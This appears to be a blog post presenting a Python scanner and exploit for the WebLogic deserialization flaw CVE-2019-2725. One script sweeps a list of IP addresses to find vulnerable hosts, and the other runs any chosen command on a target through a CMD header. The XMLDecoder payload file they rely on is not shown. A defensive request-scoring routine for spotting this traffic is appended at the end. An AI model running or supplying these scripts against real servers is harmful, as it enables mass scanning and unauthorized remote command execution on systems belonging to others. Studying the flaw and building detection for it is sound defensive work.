WebLogic deserialization remote code execution vulnerability exp (CVE-2019-2725)

The vulnerable point is WebLogic's XMLDecoder deserialization; the exploit simply uses a cleverly constructed chain to bypass the patches Oracle has issued for this weakness over the years.

Mainly I'm lazy. Without further ado, here are the exp and the poc. The poc isn't universal; use the exp more.

Put the IPs in ip.txt, then run the poc to check them.

POC

import requests
import time
import random

def exec_cmd(ip, cmd):
    # payload.txt holds the XMLDecoder payload (not included on this page);
    # the command itself is carried in the CMD request header
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads, timeout=5)
    return r.content.decode()

def test_poc(ip):
    # a random marker echoed back in the response confirms command execution
    check = str(int(time.time()) + int(random.uniform(1000, 9999)))
    out = exec_cmd(ip, 'echo ' + check)
    if check in out:
        print('vul finds:' + ip)

def main():
    print("put ips in ip.txt ")
    with open('ip.txt') as f:
        for line in f.readlines():
            try:
                # strip the trailing newline so the URL is well-formed
                test_poc(line.strip())
            except Exception:
                pass
    print("End")

if __name__ == '__main__':
    main()

exp

import requests
import sys

def exec_cmd(ip, cmd):
    # same request as the poc: payload.txt is the XMLDecoder body,
    # the command travels in the CMD header
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads)
    return r.content.decode()

def main():
    if len(sys.argv) < 3:
        print('usage:exp.py www.0dayhack.com:8080 whoami')
        sys.exit()
    ip = sys.argv[1]
    cmd = sys.argv[2]
    out = exec_cmd(ip, cmd)
    print(out)

if __name__ == '__main__':
    main()

Note:

Python 3 only

ip.txt is where the addresses to check go
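As an added example (not part of the original post), a small detection routine for the request shape the two scripts above produce: a POST to a /wls-wsat/ path with a text/xml body, the Apache-HttpClient/4.1.1 (java 1.5) User-Agent and an out-of-band CMD header. The scoring weights and the dict-shaped request records are assumptions; the sample requests are constructed, not real traffic.

```python
import re

# Request pattern of the published scripts: POST to the wls-wsat SOAP endpoint,
# text/xml body, java 1.5 HttpClient User-Agent, and a CMD header.
WLS_WSAT_PATH = re.compile(r"^/wls-wsat/", re.IGNORECASE)
SUSPICIOUS_UA = "Apache-HttpClient/4.1.1 (java 1.5)"

def score_request(method, path, headers):
    """Return (score, reasons) for one HTTP request.

    Weights are an assumption: a CMD header alone already reaches the
    alert threshold because the WS-AT endpoint has no legitimate use for it.
    """
    h = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    score, reasons = 0, []
    if method.upper() == "POST" and WLS_WSAT_PATH.search(path):
        score += 1
        reasons.append("POST to /wls-wsat/ (XMLDecoder-reachable endpoint)")
        if "text/xml" in h.get("content-type", "").lower():
            score += 1
            reasons.append("text/xml body sent to wls-wsat")
    if "cmd" in h:
        score += 2
        reasons.append("CMD header present (command carried out-of-band)")
    if h.get("user-agent", "") == SUSPICIOUS_UA:
        score += 1
        reasons.append("User-Agent matches the published scripts")
    return score, reasons

def is_suspicious(method, path, headers, threshold=2):
    return score_request(method, path, headers)[0] >= threshold

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/wls-wsat/CoordinatorPortType11",
     {"User-Agent": SUSPICIOUS_UA, "CMD": "echo 1559",
      "SOAPAction": '""', "Content-Type": "text/xml"}),
    ("GET", "/console/login/LoginForm.jsp", {"User-Agent": "Mozilla/5.0"}),
    ("POST", "/wls-wsat/CoordinatorPortType11",
     {"User-Agent": "Mozilla/5.0", "Content-Type": "text/xml"}),
]

if __name__ == "__main__":
    for method, path, headers in SAMPLES:
        score, reasons = score_request(method, path, headers)
        print(method, path, "->", score, reasons)
```

The third sample shows that any text/xml POST to wls-wsat trips the threshold even without the tell-tale header or User-Agent, which is the intended sensitivity for a component that should be patched or access-restricted rather than exposed.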
